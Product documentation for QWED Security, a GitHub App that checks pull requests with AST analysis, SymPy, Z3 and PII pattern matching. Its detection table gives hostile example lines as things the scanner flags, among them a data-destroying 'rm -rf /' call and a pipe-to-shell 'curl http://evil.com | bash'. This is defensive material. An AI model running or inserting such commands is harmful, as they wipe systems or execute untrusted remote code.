QWED Security GitHub App
QWED Security is a GitHub App that automatically scans your Pull Requests using deterministic verification engines — not another LLM. It uses formal solvers (SymPy, Z3) and AST analysis to mathematically prove that code, math, and logic in your PRs are correct.
Unlike AI code reviewers that “guess,” QWED Security provides deterministic proof. 1+1 always equals 2.
How It Works
Pull Request Opened / Updated
↓
GitHub Webhook → QWED Security App
↓
QWEDLocal Verification Engine
├─ 🛡️ Code Security (AST Analysis)
├─ 🧮 Math Verification (SymPy)
├─ ⚖️ Logic Validation (Z3 Prover)
└─ 🔒 PII Detection (Regex Patterns)
↓
✅ Pass or ❌ Fail
↓
Results posted as a GitHub Check Run
- A developer opens or updates a Pull Request
- GitHub sends a webhook event to the QWED Security App
- The app creates a Check Run (“QWED Security”) on the PR
- Files are scanned using
QWEDLocal — QWED’s in-process verification engine
- Results are posted directly to the Checks tab on the PR
What QWED Security Catches
🛡️ Code Security (AST Analysis)
Detects dangerous code patterns before they reach production:
| Pattern | Example | Risk |
|---|
| Shell injection | os.system('rm -rf /') | Remote Code Execution |
| Eval/Exec | eval(user_input) | Arbitrary code execution |
| Pipe-to-shell | curl http://evil.com | bash | Supply chain attack |
| Hardcoded secrets | api_key = "sk-proj-..." | Credential exposure |
| Unsafe imports | import subprocess | Privilege escalation |
🧮 Math Verification (SymPy)
Validates mathematical formulas and constants — tax rate calculations, interest/NPV formulas, unit conversions, and financial compliance rules.
⚖️ Logic Validation (Z3 Prover)
Ensures boolean logic and business rules are satisfiable — contract clause contradictions, business rule conflicts, and constraint satisfaction.
🔒 PII Detection
Detects sensitive data before it enters your codebase — credit card numbers, Social Security Numbers, email addresses, and API keys.
Installation
- Visit the QWED Security App
- Click Install
- Select the repositories you want to protect
- Done — QWED Security will automatically scan new Pull Requests
The app is currently under GitHub publishing review. You can still use the direct app link for installation and updates.
Plans
| Plan | Scope | Price |
|---|
| Free | Open source & personal repositories | $0 |
| Pro | Private repositories, priority scanning | Coming soon |
Check Run Output
When QWED Security scans a PR, you’ll see results directly in the Checks tab:
✅ All Clear
QWED Verification Report
✅ Verified Files
✅ math_logic.py: Passed
✅ api_handler.py: Passed
❌ Issues Found
QWED Verification Report
🚨 Issues Detected
❌ dangerous.py: SECURITY_RISK
> Reason: Forbidden function 'os.system' detected
✅ Verified Files
✅ math_logic.py: Passed
Privacy & Security
- No code storage: Files are analyzed in-memory and discarded
- Webhook verification: HMAC-SHA256 signature validation
- JWT authentication: Short-lived JWT tokens (10-minute expiry)
- Open source engines: All verification logic is Apache 2.0
Permissions
| Permission | Access | Purpose |
|---|
| Checks | Read & Write | Create and update Check Runs on PRs |
| Pull Requests | Read | Read PR metadata and trigger scans |
| Contents | Read | Read repository files for verification |
Configuration
QWED Security works out-of-the-box with zero configuration for Python projects. Simply install the app and it will start scanning PRs immediately.
- Languages: Python, Go, Rust, and TypeScript
- Trigger: Pull Request events (opened, synchronized, reopened)
QWED Security App vs GitHub Action
| Feature | QWED Security (App) | QWED GitHub Action |
|---|
| Type | Installed GitHub App | CI/CD Action |
| Setup | One-click install | Add to workflow YAML |
| Trigger | Automatic on PR | Configured in workflow |
| Verification | Code security focus | Math, Logic, Code, SQL |
| LLM Required | No (pure AST analysis) | Optional (for translation) |
Support
